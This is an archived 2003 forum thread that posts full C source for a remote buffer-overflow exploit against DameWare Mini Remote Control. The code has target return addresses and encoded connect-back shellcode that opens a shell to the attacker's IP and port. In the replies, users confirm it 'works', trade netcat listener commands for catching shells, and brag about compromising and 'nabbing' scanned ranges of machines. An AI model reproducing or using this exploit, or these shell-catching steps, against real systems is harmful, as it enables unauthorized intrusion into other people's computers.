Dameware Mini Remote Control < V3.73 Remote Exploi

Full Version: Dameware Mini Remote Control < V3.73 Remote Exploi

GovernmentSecurity.org > The Archives > Public Downloads

Anarchy

Dec 21 2003, 09:39 AM

CODE

/ ********************************************************************************
******/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - - - - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68 v3.72 */
/* In comments there's some information about offsets for jmp esp on diff OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find */
/* another better EIP for XP (hope this 2 offsets will be enough). */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/ ********************************************************************************
******/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
if(i%10==0) {
printf("\r\n%04d: ",i);
j=0;
memset(ascii,0,sizeof(ascii));
}
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
ascii[10]=0x00;
printf("%s",ascii);
}
if(!isprint(buffer[i]))
ascii[j]='.';
else
ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";

ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WIN2K_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WIN2K_SP1;
break;
case 2:
*(long*)&shellc0de[0]=RET_WIN2K_SP2;
break;
case 3:
*(long*)&shellc0de[0]=RET_WIN2K_SP3;
break;
case 4:
*(long*)&shellc0de[0]=RET_WIN2K_SP4;
break;
}
*/
break;
case 1: // winXP
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WINXP_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WINXP_SP1;
break;
}
*/
break;
}
return;
}

int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,sp,rhost,rport,shellc0de);

memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

void banner(void)
{
printf("\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock;

banner();
if(argc!=4) {
printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
return -1;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]));
return 0;
}

WeeDMoNKeY

Dec 21 2003, 09:54 AM

aye, this one works about 90000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000 x 10 better.

UnDeRTaKeR

Dec 21 2003, 10:00 AM

10x going to try it.. but i think i have it already

Flinston

Dec 21 2003, 11:43 AM

uummmmm my exploit for dmware is about 52kb big ... this one is 152kb o.O can someone explain ?

thanks anyways : D

Axl

Dec 21 2003, 12:46 PM

tested !

works like a charm !!

many 10x man !

Divx_dude

Dec 21 2003, 01:16 PM

i tested it but it seems there no universal offests in i alway's get msg

CODE

[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack :
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Patched

sorry for bad english

WeeDMoNKeY

Dec 21 2003, 05:00 PM

.. as its stated there IS NO universal offset, try some more machines.. youll get some..

datom

Dec 22 2003, 12:21 AM

wow, very nice exploit,
THANK U

ssj4conejo

Dec 22 2003, 03:13 AM

Seems to work fine up to the point of the bind shell code, i dont know how to exactly connect. i tried telneting to the port and nothign happens and i tried to netcat to it, same.. what have you guys use to connect to bindshell

WeeDMoNKeY

Dec 22 2003, 04:57 AM

rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.

Tool

Dec 22 2003, 06:39 AM

what port would you use under (ur port)?

Test24

Dec 22 2003, 09:56 AM

Thanks you for this exploit

I have always the same thing shell should be arrived at XX.XX.XX.XX:33
and nothing happen does I have something to do or is the shell opening alone because if I have to open another windows what I have to do THANKS to answer me

I opened a windows nc with nc -Lp 33 but nothing happen please help

oxygen007m

Dec 22 2003, 12:00 PM

nice work anarchy !

hope it works .

ivan288

Dec 22 2003, 12:12 PM

QUOTE (WeeDMoNKeY @ Dec 22 2003, 04:57 AM)

rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.

nope not true i still get many many shells with this.

Test24

Dec 22 2003, 12:51 PM

QUOTE (ivan288 @ Dec 22 2003, 12:12 PM)

QUOTE (WeeDMoNKeY @ Dec 22 2003, 04:57 AM)

rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.

nope not true i still get many many shells with this.

If you get many shell you can answer my question please because here it is a place for share I think

Thank you

..:Z:..

Dec 22 2003, 03:55 PM

[+] Connecting to xx.xx.xx.xx ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xx.xx.xx:666

em.... but i C nothing !!

WHo can Help PlZ ?

Bombers

Dec 22 2003, 06:20 PM

hmm skip to another one, cuz sometimes it's dosent work,
and yes it's dead by now

WeeDMoNKeY

Dec 22 2003, 06:42 PM

totally 100% dead, hahaha, everyone raped this one, gj fellas ;D i rescanned a range i got a few on, (like 20 or so) all now patched.

Tomi

Dec 23 2003, 09:38 AM

thx i have searched this Xploit and there it is the nearest Place which i have never expected ^^........

So i have to say thx a lot for this Xploit....

Test24

Dec 23 2003, 09:49 AM

It's not dead at all the thing is to make the good command for nc.

Lvvp yourport -s yourip

example: nc -Lvvp 33 -s 80.26.XX.XX

if you put the port 33 put the same for the exploit like:

exploit.exe 0.0.0.0 80.26.XX.XX 33

when it say in the other windows that the shell should come have a look and the other nc windows sometimes the shell open but now it's 1 of 50 who is going to work and tomorrow 1 of 100 so be quick.

For the one who say a lot of thing but don't know help the other go to hell and keep everything for you but it's not like this that its going on

Candypapa

Dec 23 2003, 10:09 AM

some times its like this

[+] Gathering information ...
and it seems it kind of stuck or something ...
as anyone got the same problem ?

Test24

Dec 23 2003, 11:26 AM

yes I had it but nothing to do close the windows and open another one what I can say is that I had some more result with this one than the other one

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.